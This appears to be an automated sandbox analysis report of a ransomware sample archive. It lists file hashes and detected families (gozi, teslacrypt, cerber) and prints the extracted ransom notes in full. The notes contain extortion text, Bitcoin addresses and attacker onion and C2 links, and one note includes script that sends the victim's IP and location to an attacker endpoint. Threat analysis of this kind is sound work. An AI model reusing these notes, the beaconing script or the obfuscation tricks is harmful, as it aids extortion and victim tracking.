Analysis

  • max time kernel
    119s
  • max time network
    323s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 18:33

General

  • Target

    RNSM00291.7z

  • Size

    16.4MB

  • MD5

    175a2ddac15fa0d6d65b9d7ff0a14bb3

  • SHA1

    6aef3b2af90218f68b1908fc23341bfb47688b4f

  • SHA256

    a6009358e5e3d3e091c66e8647af92f2c063720ec98b35246b60d35894ef1eda

  • SHA512

    166a3c9d33f4fea2820d49db1a9a7adb34949610036f7e178bc369e2398cd5c4eaf8b7d39b3db5c41508268861c90a9410f20acd38abfcc5337d8306337eae34

  • SSDEEP

    393216:x+xT7w8JKZ2d8b9Hwi1F7oHOBu4m9Z9lt3gCuLYI:A97w8MZuAlHhAOUNt3Hq

Malware Config

Extracted

Family

gozi

Extracted

Path

C:\Users\Public\Videos\how_to_back_files.html

Ransom Note
<html> <head> <meta charset="utf-8"> <title>HOW TO DECRYPT YOUR FILES</title> <style type="text/css"> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background-color: #C1AB8F; } .bold { font-weight: bold; } .xx { border: 1px dashed #000; background: #E3D5F1; } .mark { background: #D0D0E8; padding: 2px 5px; } .header { font-size: 30px; height: 50px; line-height: 50px; font-weight: bold; border-bottom: 10px solid #D0D0E8; } .info { background: #D0D0E8; border-left: 10px solid #00008B; } .alert { background: #FFE4E4; border-left: 10px solid #FF0000; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note .title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note .mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } </style> </head> <body> <div class="header">Your files are encrypted!</div> <div class="note private"> <div class="title">Your personal ID</div> <pre>9F A6 F9 7B AA 19 E3 C7 5F 95 8C 7A 6A 61 12 BF 52 41 D0 54 74 73 16 94 14 E4 4B F4 7F 75 28 B3 DF C9 49 CF 4B 5D ED 02 99 A4 58 31 DB DA D7 5C E6 FC 60 FA 39 69 99 B6 13 47 C0 1A C9 1C 8F 4D 12 B8 0C 65 2C 78 B5 56 1F 51 D1 9C C6 B7 B0 C1 1B 59 6F 2C B5 B3 F4 64 36 DF DA C2 81 6B C5 B9 B6 D4 AE 69 72 64 6C 16 24 FD 19 7D 2A 1F A3 F4 C3 97 61 8A BD CD 73 43 BC 39 45 15 AE 4D 23 5C </pre><!-- !!! CTpoкy He MeHяTb !!! --> </div> <div class="bold"> <div align="left">All your important data has been encrypted.</div> </div> <div class="bold">To recover data you need decryptor.</div> <div> <h2 align="center">To get the decryptor you should:</h2> <h1 align="left">pay for decrypt:</h1> <div class="note xx"> <div align="left"> <h1>site for buy bitcoin:<br> </h1> </div> <div align="left"> <strong>Buy 1 BTC on one of these sites</strong> </div> <div align="left"> <ol> <li><strong>https://localbitcoins.com</strong></li> <li><strong>https://www.coinbase.com</strong></li> <li><strong>https://xchange.cc</strong></li> </ol> </div> <div align="left"> <h1>bitcoin adress for pay:<br> </h1> </div> <div align="left">1FuCGsCmmGWZnDkzg2aa7y6RvK3KP7TG7K</div> <div align="left"><strong>Send 1 BTC for decrypt</strong></div> </div> <div> <h1>After the payment: </h1> </div> <div><p>Send screenshot of payment to <span class="mark">[email protected]</span>. In the letter include your personal ID (look at the beginning of this document).</p> </div> <div> <h1 align="center">After you will receive a decryptor and instructions</h1> </div> <div class="note alert"> <div class="title">Attention!</div> <ul><li>No Payment = No decryption</li> <li>You really get the decryptor after payment</li> <li>We give you the opportunity to decipher 1 file free of charge!</li> <li>You can make sure that the service really works and after payment for the «Decryptor» program you can actually decrypt the files!</li> <li>Do not attempt to remove the program or run the anti-virus tools</li> <li>Attempts to self-decrypting files will result in the loss of your data</li> <li>Decoders other users are not compatible with your data, because each user's unique encryption key</li> </ul> </div> </body> </html>
Emails

class="mark">[email protected]</span>

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+vvnox.txt

Family

teslacrypt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA4096 More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA4096 Key , both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1 - http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/229B45C26DC9B9 2 - http://gfkuwflbhsjdabnu4nfukerfqwlfwr4rw.ringbalor.com/229B45C26DC9B9 3 - http://oehknf74ohqlfnpq9rhfgcq93g.hateflux.com/229B45C26DC9B9 If for some reasons the addresses are not available, follow these steps: 1 - Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2 - After a successful installation, run the browser 3 - Type in the address bar: xlowfznrg4wf7dli.onion/229B45C26DC9B9 4 - Follow the instructions on the site IMPORTANT INFORMATION Your personal pages http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/229B45C26DC9B9 http://gfkuwflbhsjdabnu4nfukerfqwlfwr4rw.ringbalor.com/229B45C26DC9B9 http://oehknf74ohqlfnpq9rhfgcq93g.hateflux.com/229B45C26DC9B9 Your personal page Tor-Browser xlowfznrg4wf7dli.ONION/229B45C26DC9B9
URLs

http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/229B45C26DC9B9

http://gfkuwflbhsjdabnu4nfukerfqwlfwr4rw.ringbalor.com/229B45C26DC9B9

http://oehknf74ohqlfnpq9rhfgcq93g.hateflux.com/229B45C26DC9B9

http://xlowfznrg4wf7dli.ONION/229B45C26DC9B9

Extracted

Path

C:\Users\Admin\Documents\save_your_files.html

Ransom Note
<!DOCTYPE html><html lang="en"> <head> <title>Warning Message</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <script src="https://rendro.github.io/countdown/javascripts/jquery.countdown.js"></script> <style>p{padding: 5px 0px;}</style> </head> <body> <div id="paid" class="container hide"> <div class="row"> <div class="col-sm-12"> <h1>Thank you for your payment</h1> <br><h4>We know that we forced you to pay, but be sure that the payment was for a good cause, The money you gave will be used for food, medicine and shelter to those in need.</h4> <br><div> To get your decryption code, please visit one of the links below: <br><br><ul><li><a href=http://3hnuhydu4pd247qb.onion.to/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.to/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.onion.cab/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.cab/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.torstorm.org/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.torstorm.org/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.onion.nu/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.nu/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.tor2web.org/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.tor2web.org/getcode/3058e0f336e45d623937f1952ecb938e</a></li></ul> </div><div> If none of the links work, please download and install TOR browser from this link (<a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">Download Tor Browser</a>) and after opening Tor browser visit one of this links: <br><br><ul><li><a href=http://3hnuhydu4pd247qb.onion/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion/getcode/3058e0f336e45d623937f1952ecb938e</a></li></ul> </div><p> When you visit your link you will get your personal unique decryption code, copy & paste it to the window and all of your files will be decrypted immediately. </p></div></div></div><div id="notpaid" class="jumbotron text-center"> <h1 style="color: red; margin: 0px;">Warning Message!!</h1> <p>We are sorry to say that your computer and <strong style="color: red;">your files have been encrypted</strong>, <BR> but wait, don't worry. There is a way that you can restore your computer and all of your files</p><div class="countdown"> <h3 id="clock" style="color: green;"></h3> Time remain when your files will lost forever! </div></div><div id="notpaid1" class="container notpaid"> <div class="row"> <div class="col-sm-12 alert-info text-center"> <h3>Your personal unique ID: <strong style="text-decoration: underline; color: red;">3058e0f336e45d623937f1952ecb938e</strong></h3> <h3>Please send at least <strong style="text-decoration: underline; color: red;">1.0 Bitcoin</strong> to address <strong style="text-decoration: underline; color: red;">1G21kKmUJbMjL1YueHN6aE28ZLpY4t2Pn3</strong></h3> <br><h4><button id="chkbalance">Click to check your Balance</button><br><small><strong id="balance"></strong></small></h4> </div></div><div class="row"> <div class="col-sm-6"> <h3>Restoring your files - The fast and easy way</h3> <p>To get your files fast, please transfer <strong style="text-decoration: underline; color: red;">1.0 Bitcoin</strong> to our wallet address <strong style="text-decoration: underline; color: red;">1G21kKmUJbMjL1YueHN6aE28ZLpY4t2Pn3</strong>. When we will get the money, we will immediately give you your private decryption key. Payment should be confirmed in about 2 hours after payment made.</p></div><div class="col-sm-6"> <h3>Restoring your files - The nasty way</h3> <p>Send the link below to other people, if two or more people will install this file and pay, we will decrypt your files for free.</p><input type="text" value="https://3hnuhydu4pd247qb.onion.to/r/3058e0f336e45d623937f1952ecb938e" size="80%" style="color: blue;"/> </div></div><div class="row"> <div class="col-sm-12"> <h3>Get code to restore your files</h3> <div> To get your decryption code, please visit one of the links below: <br><br><ul><li><a href=http://3hnuhydu4pd247qb.onion.to/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.to/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.onion.cab/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.cab/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.torstorm.org/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.torstorm.org/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.onion.nu/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.nu/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.tor2web.org/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.tor2web.org/getcode/3058e0f336e45d623937f1952ecb938e</a></li></ul> </div><div> If none of the links work, please download and install TOR browser from this link (<a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">Download Tor Browser</a>) and after opening Tor browser visit one of this links: <br><br><ul><li><a href=http://3hnuhydu4pd247qb.onion/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion/getcode/3058e0f336e45d623937f1952ecb938e</a></li></ul> </div><p> When you visit your link you will get your personal unique decryption code, copy & paste it to the window and all of your files will be decrypted immediately. </p></div></div><div class="row"> <div class="col-sm-4"> <h3>What we did?</h3> <p> We had encrypted all of your important images, documents, videos and all other files on your computer. We used a very strong encryption algorithm that used by all governments all over the world <a href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard" target="_blank">(Encryption -Wikipedia)</a>. We store your personal decryption code to your files on our servers and we are the only ones that can decrypt your files. Please don't try to be smart, anything other than payment will cause damage to your files and the files will be lost forever!!! </p><p class="alert-danger text-center" style="padding: 5px 10px"> If you will not pay for the next 7 days, the decryption key will be deleted and your files will be lost forever. </p></div><div class="col-sm-7"> <h3>Why we do that?</h3> <p> We are a group of computer science students from Syria, as you probably know Syria is having bad time for the last 5 years. Since 2011 we have more the half million people died and over 5 million refugees. Each part of our team has lost a dear member from his family. <strong>I personally have lost both my parents and my little sister in 2015.</strong> The sad part of this war is that all the parts keep fighting but eventually we the poor and simple people suffer and watching our family and friends die each day. <br>The world remained silent and no one helping us so we decided to take an action. <a href="https://en.wikipedia.org/wiki/Syrian_Civil_War" target="_blank">(Syria War in Wikipedia)</a> <br></p><p class="alert-success text-center"> Be perfectly sure that all the money that we get goes to food, medicine, shelter to our people. <br>We are extremely sorry that we forcing you to pay but that's the only way that we can keep living. </p></div></div><div class="row"> <div class="col-sm-12"> <h3>How to buy Bitcoins?</h3> <p> If you aren't familiar with Bitcoin and don't know what is it, please visit the official Bitcoin website (<a href='https://bitcoin.org/en/getting-started' target="_blank">https://bitcoin.org/en/getting-started</a>), follow the steps and you'll get your Bitcoins. <br>To understand more you can check also on the FAQ page (<a href='https://bitcoin.org/en/faq' target='_blank'>https://bitcoin.org/en/faq</a>). <br>Please check this website (<a href='https://coinatmradar.com/' target='_blank'>https://coinatmradar.com/</a>) where you can find Bitcoin ATM all over the world. </p></div></div><div class="row"> <div class="col-sm-12"> <h3>Full list of encrypted files</h3> <textarea style="width: 100%; height: 400px;"></textarea> <br><br><br><br></div></div></div><script>function check(){$.get("https://blockchain.info/q/addressbalance/1G21kKmUJbMjL1YueHN6aE28ZLpY4t2Pn3?confirmations=3", function (data){data=data / 100000000; if (data >=1.0){$("#paid").removeClass("hide"); $("#notpaid").addClass("hide"); $("#notpaid1").addClass("hide");}else{$("#balance").html("Current balance is: " + data + " Bitcoins");}});}$("#chkbalance").on("click", function (){check();}); $(function (){check(); $('#clock').countdown({date: "Dec 20, 2016 15:06:55"});}); $(document).ready(function (){$.getJSON("http://freegeoip.net/json/", function (data){$.get("https://3hnuhydu4pd247qb.onion.to/pixel/3058e0f336e45d623937f1952ecb938e/" + data.ip + "/" + data.country_code + "/" + data.country_name, function (){});});}); </script> </body></html>

Extracted

Path

C:\Users\Public\Documents\_READ_THI$_FILE_95D5_.hta

Family

cerber

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>C&#069;RBE&#82; &#82;ANSOMWA&#82;&#069;: Instructi&#111;ns</title> <HTA:APPLICATION APPLICATIONNAME="i" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .h { display: none; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; padding-left: 35px; background: url('data:image/gif;base64,R0lGODlhGQAZAKIEAMzMzJmZmTMzM2ZmZgAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQFAAAEACwAAAAAGQAZAAADVki63P4wSEiZvLXemRf4yhYoQ0l9aMiVLISCDms+L/DIwwnfc+c3qZ9g6Hn5hkhF7YgUKI2dpvNpExJ/WKquSoMCvd9geDeuBpcuGFrcQWep5Df7jU0AACH5BAUAAAQALAoAAQAOABQAAAMwSLDU/iu+Gdl0FbTAqeXg5YCdSJCBuZVqKw5wC8/qHJv2IN+uKvytn9AnFBCHx0cCACH5BAUAAAQALAoABAAOABQAAAMzSLoEzrC5F9Wk9YK6Jv8gEYzgaH4myaVBqYbfIINyHdcDI+wKniu7YG+2CPI4RgFI+EkAACH5BAUAAAQALAQACgAUAA4AAAMzSLrcBNDJBeuUNd6WwXbWtwnkFZwMqUpnu6il06IKLChDrsxBGufAHW0C1IlwxeMieEkAACH5BAUAAAQALAEACgAUAA4AAAM0SLLU/lAtFquctk6aIe5gGA1kBpwPqVZn66hl1KINPDRB3sxAGufAHc0C1IkIxcARZ4QkAAAh+QQFAAAEACwBAAQADgAUAAADMUhK0vurSfiko8oKHC//yyCCYvmVI4cOZAq+UCCDcv3VM4cHCuDHOZ/wI/xxigDQMAEAIfkEBQAABAAsAQABAA4AFAAAAzNIuizOkLgZ13xraHVF1puEKWBYlUP1pWrLBLALz+0cq3Yg324PAUAXcNgaBlVGgPAISQAAIfkEBQAABAAsAQABABQADgAAAzRIujzOMBJHpaXPksAVHoogMlzpZWK6lF2UjgobSK9AtjSs7QTg8xCfELgQ/og9I1IxXCYAADs=') left no-repeat; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a id="change_language" href="#" onclick="return changeLanguage1();" title="English">&#9745; English</a> <h1>C&#069;&#82;BE&#82; &#82;ANSOMWA&#82;&#069;</h1> <small id="title">Instructions</small> </div> <div id="languages"> <p>&#9745; Select your language</p> <ul> <li><a href="#" title="English" onclick="return showBlock('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return showBlock('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return showBlock('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return showBlock('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return showBlock('fr');">Français</a></li> <li><a href="#" title="German" onclick="return showBlock('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return showBlock('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return showBlock('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return showBlock('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return showBlock('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return showBlock('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return showBlock('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return showBlock('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> <p>Can't yo<span class="h">4</span>u find the necessary files?<br>Is the c<span class="h">exKM</span>ontent of your files not readable?</p> <p>It is normal be<span class="h">YBdf5niq</span>cause the files' names and the data in your files have been encryp<span class="h">mVjKo2</span>ted by "Ce<span class="h">5ef</span>r&#98;er&nbsp;Rans&#111;mware".</p> <p>It me<span class="h">UoGUjxs</span>ans your files are NOT damage<span class="h">q</span>d! Your files are modified only. This modification is reversible.<br>F<span class="h">TduV</span>rom now it is not poss<span class="h">z</span>ible to use your files until they will be decrypted.</p> <p>The only way to dec<span class="h">gg0bhyRoE2</span>rypt your files safely is to &#98;uy the special decryption software "C<span class="h">JktSg9rK7</span>er&#98;er&nbsp;Decryptor".</p> <p>Any attempts to rest<span class="h">grV1ymBma3</span>ore your files with the thir<span class="h">yO</span>d-party software will be fatal for your files!</p> <hr> <p class="w331208">You can proc<span class="h">vKbwm</span>eed with purchasing of the decryption softw<span class="h">p4QSE</span>are at your personal page:</p> <p><span class="info"><span class="updating">Ple<span class="h">zK7Pcdxe</span>ase wait...</span><a class="url" href="http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB</a></span></p> <p>If t<span class="h">3M</span>his page cannot be opened &nbsp;<span class="button" onclick="return updUrl('en');">cli<span class="h">BQl76</span>ck here</span>&nbsp; to get a new addr<span class="h">Fl</span>ess of your personal page.<br><br>If the addre<span class="h">MdBCBhr2f2</span>ss of your personal page is the same as befo<span class="h">ytjQ8Ame</span>re after you tried to get a new one,<br>you c<span class="h">RIx</span>an try to get a new address in one hour.</p> <p>At th<span class="h">2fkqx5ymBl</span>is p&#097;ge you will receive the complete instr<span class="h">Q</span>uctions how to buy the decrypti<span class="h">g8Y0YPSf</span>on software for restoring all your files.</p> <p>Also at this p&#097;ge you will be able to res<span class="h">wR</span>tore any one file for free to be sure "Cer&#98;e<span class="h">6S</span>r&nbsp;Decryptor" will help you.</p> <hr> <p>If your per<span class="h">Ttx</span>sonal page is not availa<span class="h">w</span>ble for a long period there is another way to open your personal page - insta<span class="h">woWTOU</span>llation and use of Tor&nbsp;Browser:</p> <ol> <li>run your Inte<span class="h">OtpbTs</span>rnet browser (if you do not know wh&#097;t it is run the Internet&nbsp;Explorer);</li> <li>ent<span class="h">P</span>er or copy the &#097;ddress <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/downlo&#097;d/download-easy.html.en</a> into the address bar of your browser &#097;nd press ENTER;</li> <li>wait for the site load<span class="h">Z1zoRKH</span>ing;</li> <li>on the site you will be offered to do<span class="h">lyqhY60RRM</span>wnload Tor&nbsp;Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>ru<span class="h">tt0Sn</span>n Tor&nbsp;Browser;</li> <li>connect with the butt<span class="h">w6EtszI</span>on "Connect" (if you use the English version);</li> <li>a normal Internet bro<span class="h">IlkcK</span>wser window will be opened &#097;fter the initialization;</li> <li>type or copy the add<span class="h">gsCCHf</span>ress <br><span class="info">http://p27dokhpz2n7nvgr.onion/F26E-3268-3C90-0446-9BDB</span><br> in this browser address bar;</li> <li>pre<span class="h">vSeb6Tip0</span>ss ENTER;</li> <li>the site sho<span class="h">sa3</span>uld be loaded; if for some reason the site is not lo<span class="h">XBZ6USgbzV</span>ading wait for a moment and try again.</li> </ol> <p>If you have any pr<span class="h">iJqVQb5yN</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">b8HgYPnr</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> <hr> <p><strong>Addit<span class="h">nJ4</span>ional information:</strong></p> <p>You will fi<span class="h">l8QqF</span>nd the instru<span class="h">e0drX</span>cti&#111;ns ("*_READ_THIS_FILE_*.hta") for re<span class="h">q255</span>st&#111;ring y&#111;ur files in &#097;ny f<span class="h">qmzJ0C2rFA</span>&#111;lder with your enc<span class="h">KETQgOTGV</span>rypted files.</p> <p>The instr<span class="h">BJDF</span>ucti&#111;ns "*_READ_THIS_FILE_*.hta" in the f<span class="h">7Mw8w</span>&#111;lder<span class="h">zNpRJm0y</span>s with your encry<span class="h">9MMcBw5sSF</span>pted files are not vir<span class="h">ny4w</span>uses! The instruc<span class="h">h</span>tions "*_READ_THIS_FILE_*.hta" will he<span class="h">YNMhLsEM9E</span>lp you to dec<span class="h">Qdrjs2qT</span>rypt your files.</p> <p>Remembe<span class="h">sGVcc</span>r! The w&#111;rst si<span class="h">cWwa</span>tu&#097;tion already happ<span class="h">vDQiZ</span>ened and n&#111;w the future of your files de<span class="h">Ni4n8grD6</span>pends on your determ<span class="h">zp0</span>ination and speed of your actions.</p> </div> <div id="ar" style="direction: rtl;"> <p>لا يمكنك العثور على الملفات الضرورية؟<br>هل محتوى الملفات غير قابل للقراءة؟</p> <p>هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cer&#98;er&nbsp;Rans&#111;mware".</p> <p>وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا.<br>ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها.</p> <p>الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cer&#98;er&nbsp;Decryptor".</p> <p>إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك!</p> <hr> <p>يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية:</p> <p><span class="info"><span class="updating">أرجو الإنتظار...</span><a class="url" href="http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB</a></span></p> <p>في حالة تعذر فتح هذه الصفحة &nbsp;<span class="button" onclick="return updUrl('ar');">انقر هنا</span>&nbsp; لإنشاء عنوان جديد لصفحتك الشخصية.</p> <p>في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك.</p> <p>في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cer&#98;er&nbsp;Decryptor" سوف يساعدك.</p> <hr> <p>إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor:</p> <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان <br><span class="info">http://p27dokhpz2n7nvgr.onion/F26E-3268-3C90-0446-9BDB</span><br> في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> <p>إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه.</p> <hr> <p><strong>معلومات إضافية:</strong></p> <p>سوف تجد إرشادات استعادة الملفات الخاصة بك ("*_READ_THIS_FILE_*") في أي مجلد مع ملفاتك المشفرة.</p> <p>الإرشادات ("*_READ_THIS_FILE_*") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*_READ_THIS_FILE_*") سوف تساعدك على فك تشفير الملفات الخاصة بك.</p> <p>تذكر أن أسوأ موقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك.</p> </div> <div id="zh"> <p>您找不到所需的文件?<br>您文件的内容无法阅读?</p> <p>这是正常的,因为您文件的文件名和数据已经被“Cer&#98;er&nbsp;Rans&#111;mware”加密了。</p> <p>这意味着您的文件并没有损坏!您的文件只是被修改了,这个修改是可逆的,解密之前您无法使用您的文件。</p> <p>安全�

Extracted

Path

C:\Users\Public\Documents\_READ_THI$_FILE_HPGM_.txt

Ransom Note
